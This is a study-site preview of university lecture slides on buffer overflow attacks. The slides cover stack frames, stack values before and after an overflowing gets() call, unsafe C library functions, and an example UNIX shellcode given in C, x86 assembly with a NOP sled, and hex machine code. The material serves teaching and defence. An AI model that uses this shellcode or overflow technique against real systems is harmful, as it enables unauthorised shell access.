When one function calls another it needs somewhere to

This preview shows page 9 - 17 out of 31 pages.

When one function calls another it needs somewhere to save the return address Also needs locations to save the parameters to be passed in to the called function and to possibly save register values
Image of page 9

Subscribe to view the full document.

Return Addr Old Frame Pointer Return Addr in P Stack Pointer local 1 param1 param2 P: Q: Frame Pointer Old Frame Pointer local 2 Figure 10.3 Example Stack Frame with Functions P and Q
Image of page 10
Process Control Block Global Data Heap Process imagein main memory Program Machine Code Global Data Program File Program Machine Code Stack Spare Memory Kernel Code and Data Top of Memory Bottom of Memory Figure 10.4 Program Loading into Process Memory
Image of page 11

Subscribe to view the full document.

Image of page 12
Memory Address Before gets(inp) After gets(inp) Contains Value of . . . . . . . . . . . . bffffbe0 3e850408 > . . . 00850408 . . . . tag bffffbdc f0830408 . . . . 94830408 . . . . return addr bffffbd8 e8fbffbf . . . . e8ffffbf . . . . old base ptr bffffbd4 60840408 ` . . . 65666768 e f g h bffffbd0 30561540 0 V . @ 61626364 a b c d bffffbcc 1b840408 . . . . 55565758 U V W X inp[12-15] bffffbc8 e8fbffbf . . . . 51525354 Q R S T inp[8-11] bffffbc4 3cfcffbf < . . . 45464748 E F G H inp[4-7] bffffbc0 34fcffbf 4 . . . 41424344 A B C D inp[0-3] . . . . . . . . . . . . Figure 10.6 Basic Stack Overflow Stack Values
Image of page 13

Subscribe to view the full document.

Table 10.2 Some Common Unsafe C Standard Library Routines gets(char *str) read line from standard input into str spri ntf (char *str, char *f ormat, . . . ) create str according to supplied format and variables strcat(char *dest, char *src) append contents of string src to string dest strcpy(char *dest, char *src) copy contents of string src to string dest vspri ntf (char *str, char *f mt, va_l i st ap) create str according to supplied format and variables
Image of page 14
Shellcode Code supplied by attacker Often saved in buffer being overflowed Traditionally transferred control to a user command-line interpreter (shell) Machine code Specific to processor and operating system Traditionally needed good assembly language skills to create More recently a number of sites and tools have been developed that automate this process Metasploit Project Provides useful information to people who perform penetration, IDS signature development , and exploit research
Image of page 15

Subscribe to view the full document.

int main(int argc, char *argv[]) { char *sh; char *args[2]; sh = "/bin/sh"; args[0] = sh; args[1] = NULL; execve(sh, args, NULL); } (a) Desired shellcodecode in C nop nop / / end of nop sled jmp find // jump to end of code cont: pop %esi // pop address of sh off stack into %esi xor %eax,%eax // zero contents of EAX mov %al,0x7(%esi) // copy zero byte to end of string sh (%esi) lea (%esi),%ebx // load address of sh (%esi) into %ebx mov %ebx,0x8(%esi) // save address of sh in args[0] (%esi+8) mov %eax,0xc(%esi) // copy zero to args[1] (%esi+c) mov $0xb,%al // copy execve syscall number (11) to AL mov %esi,%ebx // copy address of sh (%esi) t0 %ebx lea 0x8(%esi),%ecx // copy address of args (%esi+8) to %ecx lea 0xc(%esi),%edx // copy address of args[1] (%esi+c) to %edx int $0x80 // software interrupt to execute syscall find: call cont // call cont which saves next address on stack sh: .string "/bin/sh " // string constant args: .long 0 // space used for args array .long 0 // args[1] and also NULL for env array (b) Equivalent position-independent x86 assembly code 90 90 eb 1a 5e 31 c0 88 46 07 8d 1e 89 5e 08 89 46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 e8 e1 ff ff ff 2f 62 69 6e 2f 73 68 20 20 20 20 20 20 (c) Hexadecimal values for compiled x86 machinecode Figure 10.8 Exampl e UNIX Shellco de
Image of page 16
Image of page 17
  • Fall '16
  • Randy Fortier

{[ snackBarMessage ]}

What students are saying

  • Left Quote Icon

    As a current student on this bumpy collegiate pathway, I stumbled upon Course Hero, where I can find study resources for nearly all my courses, get online help from tutors 24/7, and even share my old projects, papers, and lecture notes with other students.

    Student Picture

    Kiran Temple University Fox School of Business ‘17, Course Hero Intern

  • Left Quote Icon

    I cannot even describe how much Course Hero helped me this summer. It’s truly become something I can always rely on and help me. In the end, I was not only able to survive summer classes, but I was able to thrive thanks to Course Hero.

    Student Picture

    Dana University of Pennsylvania ‘17, Course Hero Intern

  • Left Quote Icon

    The ability to access any university’s resources through Course Hero proved invaluable in my case. I was behind on Tulane coursework and actually used UCLA’s materials to help me move forward and get everything together on time.

    Student Picture

    Jill Tulane University ‘16, Course Hero Intern